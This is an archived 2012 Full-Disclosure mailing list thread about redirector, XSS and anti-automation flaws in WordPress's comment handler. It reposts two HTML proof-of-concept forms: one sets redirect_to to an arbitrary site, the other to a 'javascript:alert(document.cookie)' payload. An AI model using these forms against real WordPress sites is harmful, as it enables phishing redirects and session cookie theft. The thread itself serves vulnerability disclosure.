lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <57db066ca90c62c007d1ae9fea2be4ec@intern0t.net> Date: Sat, 05 May 2012 09:54:02 -0400 From: InterN0T Advisories <advisories@...ern0t.net> To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk> Subject: Re: IAA, Redirector and XSS vulnerabilities in WordPress Hi List, To stop MustLive's desperate act of trying to get visitors (and more backlinks) to his website, I have for those that doesn't want to go to there, just to see the PoC's but actually read them on this mailing list like almost _every other_ Proof of Concept / exploit, made them available below. Contents of Wordpress Redirector: <html> <head> <title>WordPress Redirector exploit (lol?) (C) 2012 MustLive. [removed]</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-comments-post.php" method="post"> <input type="hidden" name="author" value="Test" /> <input type="hidden" name="email" value="test@...t.test" /> <input type="hidden" name="comment" value="Test" /> <input type="hidden" name="comment_post_ID" value="1" /> <input type="hidden" name="redirect_to" value="http://awebsite.tld" /> </form> </body> </html> -------------------------------------- Contents of Wordpress XSS: <html> <head> <title>WordPress XSS exploit (lol?) (C) 2012 MustLive. [removed]</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-comments-post.php" method="post"> <input type="hidden" name="author" value="Test" /> <input type="hidden" name="email" value="test@...t.test" /> <input type="hidden" name="comment" value="Test21" /> <input type="hidden" name="comment_post_ID" value="1" /> <input type="hidden" name="redirect_to" value="javascript:alert%28document.cookie%29//" /> </form> </body> </html> -------------------------------------- I don't really have any comments about these "exploits". Best regards, Nemesis 3.0 On Sat, 5 May 2012 16:01:53 +0300, "MustLive" <mustlive@...security.com.ua> wrote: > Hello list! > > I want to warn you about security vulnerabilities in WordPress. > > These are Insufficient Anti-automation, Redirector and Cross-Site > Scripting > vulnerabilities. > > ------------------------- > Affected products: > ------------------------- > > Vulnerable are WordPress 2.0 - 3.3.1. > > ---------- > Details: > ---------- > > Already from WP 2.0 there are Insufficient Anti-automation, Redirector and > XSS vulnerabilities in wp-comments-post.php. With IAA I've faced just when > begun using WP in 2006. If the developers fixed vulnerabilities in > previous > two redirectors in WP 2.3, then these vulnerabilities were not fixed even > in > WP 3.3.1 > > IAA (WASC-21): > > Lack of captcha in comment form allows to conduct automated attacks. The > developers still haven't put captcha in WP comments form (from the first > version of engine), which besides IAA attacks, also allowed to conduct > Redirector and XSS attacks. > > By default in WordPress the premoderation is turned on, and also there is > built-in anti-spam filter. But if 10 years ago the premoderation would be > enough, then long ago this mechanism couldn't be considered as sufficient > protection against spam, and anti-spam filter had efficiency less then 1% > - > only few from spam messages he marked as spam. And also these mechanisms > don't protect against below-mentioned attacks. Also plugin Akismet is > bundled with WP, which is "captcha-less" protection against spam. But by > default it's turned off and comparing with captcha it's considered as less > efficient and also doesn't protect against below-mentioned attacks. > > Redirector (URL Redirector Abuse) (WASC-38): > > Exploit: > > [Removed] > > XSS (WASC-08): > > Exploit: > > [Removed] > > XSS attack is possible on different browsers, but it's harder to conduct > then in case of previous two redirectors (via data URI). At IIS web > servers > the redirect is going via Refresh header, and at other web servers - via > Location header. > > Due to nuances of work of this script (filtering of important symbols and > adding of anchor), for execution of JS code it's needed to use tricky > bypass > methods. This complexity exists as with javascript URI, as with combo > variant javascript URI + data URI. > > Reliable captcha protects against IAA, Redirector and XSS vulnerabilities. > > ------------ > Timeline: > ------------ > > 2012.04.26 - disclosed at my site > > Best wishes & regards, > MustLive > Administrator of Websecurity web site > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists